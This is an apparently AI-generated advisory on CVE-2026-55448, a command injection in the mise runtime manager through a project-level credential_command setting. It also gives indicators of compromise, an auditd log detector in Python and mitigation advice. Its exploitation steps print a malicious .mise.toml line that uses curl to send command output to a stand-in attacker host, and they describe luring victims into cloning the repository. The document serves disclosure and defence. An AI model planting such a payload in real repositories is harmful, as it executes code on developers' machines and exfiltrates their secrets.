CVE-2026-55448
Rust vulnerability analysis and mitigation

Overview

CVE-2026-55448 is an OS command injection vulnerability in mise (a polyglot runtime manager) that allows an attacker who can place a malicious .mise.toml in a repository to execute arbitrary shell commands as the victim user. The vulnerability affects mise versions >= 2026.3.15 and < 2026.6.4 (the credential_command field was introduced in v2026.3.15; v2026.3.14 rejects it as unknown). It was published on June 12, 2026, and patched on June 23, 2026. The CVSS v3.1 base score is 6.3 (Moderate) (GitHub Advisory, mise Advisory).

Technical details

The root cause is CWE-78 (OS Command Injection): mise loads github.credential_command from local project config files via Settings::try_get() and parse_settings_file() without first verifying whether the local .mise.toml is trusted. When resolve_token() is called to obtain a GitHub token and no higher-priority GitHub token environment variable (e.g., GITHUB_TOKEN, MISE_GITHUB_TOKEN) is set, it reaches get_credential_command_token(), which executes the configured value directly via std::process::Command::new("sh").arg("-c").arg(cmd). This means any value set under [settings.github] credential_command in a local project config is executed as a shell command without sanitization or trust validation, enabling an attacker-controlled repository to supply arbitrary shell commands (GitHub Advisory, mise Advisory).

Impact

Successful exploitation allows arbitrary shell command execution as the victim user, with no trust prompt and no requirement for [env], [hooks], tasks, or templates in the malicious config. An attacker can achieve full confidentiality and integrity compromise of the victim's user context — including exfiltrating secrets, credentials, or source code, and modifying files. The attack is limited to scenarios where no higher-priority GitHub token environment variable is already set in the victim's environment (GitHub Advisory).

Exploitation steps

  1. Prepare malicious repository: Create or compromise a repository and add a .mise.toml file containing:

     [settings.github]
     credential_command = "curl -s https://attacker.example.com/exfil?data=$(id); echo ghp_fake_token"

  2. Social engineering / supply chain: Convince the victim to clone the repository (e.g., via a pull request, open-source contribution, or supply chain compromise).
  3. Ensure no GitHub token env vars are set: The exploit only triggers if GITHUB_TOKEN, GITHUB_API_TOKEN, MISE_GITHUB_TOKEN, and MISE_GITHUB_ENTERPRISE_TOKEN are all unset in the victim's shell session.
  4. Trigger execution: The victim runs any mise command that resolves a GitHub token, such as:

     mise github token --unmask

  5. Command executes: mise loads the local .mise.toml, passes the credential_command value to sh -c without trust validation, executing the attacker's payload as the victim user.
  6. Achieve objective: The attacker receives exfiltrated data (e.g., environment variables, SSH keys, tokens) or achieves persistent access depending on the payload (GitHub Advisory, mise Advisory).

Indicators of compromise

  • File System: Unexpected files created in /tmp/ (e.g., /tmp/mise-proof.txt) or other writable directories following mise command execution; new or modified files in the user's home directory or project directories after running mise.
  • Process: Unexpected child processes spawned by mise (e.g., sh, curl, wget, bash, python) visible in process trees; outbound network connections initiated by shell processes spawned from mise.
  • Network: Unusual outbound HTTP/HTTPS requests from developer workstations to unknown external hosts shortly after mise command execution, particularly from shell child processes.
  • Logs: Shell history or audit logs showing mise github token or similar commands executed in directories containing a .mise.toml with a credential_command entry; system audit logs (e.g., auditd) recording execve calls for sh -c with suspicious arguments originating from the mise process.
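The process and log indicators above, turned into a small detector that runs over raw auditd exec records. This is an added example, not part of the advisory or of mise: it flags a shell started with -c whose parent process (by ppid) is mise. It assumes execve is audited so that each exec produces a SYSCALL plus EXECVE record pair, as auditd emits them, and that the parent mise process was itself exec'd under audit so its comm is known by pid. The log lines below are constructed samples; the command in them is a harmless placeholder.

```python
import os
import re
from collections import defaultdict

KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
SERIAL_RE = re.compile(r'msg=audit\([\d.]+:(\d+)\)')
HEX_RE = re.compile(r'[0-9A-Fa-f]+')
SHELLS = {"sh", "bash", "dash", "zsh"}

# Constructed sample: mise (pid 4100) execs `sh -c` with a placeholder command;
# an unrelated shell (ppid 2500) runs "ls -la".  auditd hex-encodes an EXECVE
# argument that contains spaces, as in serial 4521.
SAMPLE_AUDIT_LOG = """\
type=SYSCALL msg=audit(1718000000.100:4520): arch=c000003e syscall=59 success=yes exit=0 ppid=3900 pid=4100 auid=1000 uid=1000 comm="mise" exe="/home/dev/.local/bin/mise" key="exec"
type=EXECVE msg=audit(1718000000.100:4520): argc=3 a0="mise" a1="github" a2="token"
type=SYSCALL msg=audit(1718000000.130:4521): arch=c000003e syscall=59 success=yes exit=0 ppid=4100 pid=4102 auid=1000 uid=1000 comm="sh" exe="/usr/bin/dash" key="exec"
type=EXECVE msg=audit(1718000000.130:4521): argc=3 a0="sh" a1="-c" a2=6563686F20706C616365686F6C6465722D746F6B656E
type=SYSCALL msg=audit(1718000000.500:4522): arch=c000003e syscall=59 success=yes exit=0 ppid=2500 pid=4110 auid=1000 uid=1000 comm="sh" exe="/usr/bin/dash" key="exec"
type=EXECVE msg=audit(1718000000.500:4522): argc=3 a0="sh" a1="-c" a2="ls -la"
"""


def unquote(raw: str) -> str:
    return raw[1:-1] if len(raw) >= 2 and raw[0] == raw[-1] == '"' else raw


def decode_execve_arg(raw: str) -> str:
    """EXECVE args are quoted, or hex-encoded when they contain spaces/specials."""
    if raw.startswith('"'):
        return unquote(raw)
    if len(raw) % 2 == 0 and HEX_RE.fullmatch(raw):
        return bytes.fromhex(raw).decode("utf-8", "replace")
    return raw


def parse_record(line: str):
    """Return (serial, record type, fields) or None for an unparseable line."""
    m = SERIAL_RE.search(line)
    if not m:
        return None
    fields = dict(KV_RE.findall(line))
    return m.group(1), fields.get("type"), fields


def group_events(lines):
    """Collect the records that share one audit serial into a single event."""
    events = defaultdict(dict)
    for line in lines:
        parsed = parse_record(line)
        if parsed:
            serial, rtype, fields = parsed
            events[serial][rtype] = fields
    return events


def execve_argv(fields):
    """Rebuild argv from an EXECVE record (argc plus a0..aN)."""
    argc = int(fields.get("argc", "0"))
    return [decode_execve_arg(fields.get(f"a{i}", "")) for i in range(argc)]


def find_mise_shell_children(lines):
    """Alert on `sh -c <cmd>` whose parent (resolved by ppid) is a mise process."""
    events = group_events(lines)
    comm_by_pid = {}  # caveat: pid reuse over a long log can mislead this map
    for ev in events.values():
        sc = ev.get("SYSCALL")
        if sc and "pid" in sc:
            comm_by_pid[sc["pid"]] = unquote(sc.get("comm", ""))
    alerts = []
    for serial in sorted(events, key=int):
        sc, ex = events[serial].get("SYSCALL"), events[serial].get("EXECVE")
        if not sc or not ex:
            continue
        argv = execve_argv(ex)
        if (len(argv) >= 3 and os.path.basename(argv[0]) in SHELLS
                and argv[1] == "-c"
                and comm_by_pid.get(sc.get("ppid")) == "mise"):
            alerts.append({"serial": serial, "pid": sc.get("pid"),
                           "ppid": sc.get("ppid"), "uid": sc.get("uid"),
                           "command": argv[2]})
    return alerts


if __name__ == "__main__":
    for alert in find_mise_shell_children(SAMPLE_AUDIT_LOG.splitlines()):
        print(f"audit serial {alert['serial']}: mise (pid {alert['ppid']}) "
              f"spawned shell pid {alert['pid']} running {alert['command']!r}")
```

Run it against a real audit.log with `find_mise_shell_children(open("/var/log/audit/audit.log").read().splitlines())`. Because the parent is resolved through the pid-to-comm map built from the same log, the mise exec itself must be within the log window; pairing it with the `.mise.toml` file-system indicator above reduces false positives from legitimate uses of a credential helper in the global config.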

Mitigation and workarounds

Upgrade mise to version 2026.6.4 or later, which resolves the issue by not honoring github.credential_command from non-global project config files. As a workaround prior to patching, always set a GitHub token environment variable (e.g., GITHUB_TOKEN) so the vulnerable credential_command path is never reached. Users should also audit any .mise.toml files in repositories they work with for unexpected [settings.github] credential_command entries (GitHub Advisory, mise Advisory).

Additional resources


Source: This report was generated using artificial intelligence

Related Rust vulnerabilities:

CVE ID         | Severity | Score | Technologies | Component name | CISA KEV exploit | Has fix | Publication date
CVE-2026-55441 | HIGH     | 8.6   | Rust         | mise           | No               |         | Jun 23, 2026
CVE-2026-55448 | MEDIUM   | 6.3   | Rust         | mise           | No               |         | Jun 23, 2026
CVE-2026-49983 | MEDIUM   | 5.2   | Rust         | deno           | No               |         | Jun 23, 2026
CVE-2026-49860 | MEDIUM   | 5.2   | Rust         | deno           | No               |         | Jun 23, 2026
CVE-2026-55517 | MEDIUM   | 4.3   | Rust         | deno           | No               |         | Jun 23, 2026
